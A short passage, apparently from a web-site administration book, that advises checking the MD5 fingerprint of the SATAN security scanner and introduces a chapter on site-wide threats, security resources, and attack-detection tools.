To be sure you have a legitimate version of SATAN, check the MD5 message digest fingerprint. The latest fingerprints for each component are available at http://www.cs. ruu.nl/cert-uu/satan.html.

This chapter picks up where Chapter 17, "How to Keep Portions of the Site Private," left off. It describes the threat to the site as a whole, resources that can help secure a site, and specific tools and techniques that can enhance security and make it more likely to detect an attack even if the attack succeeds.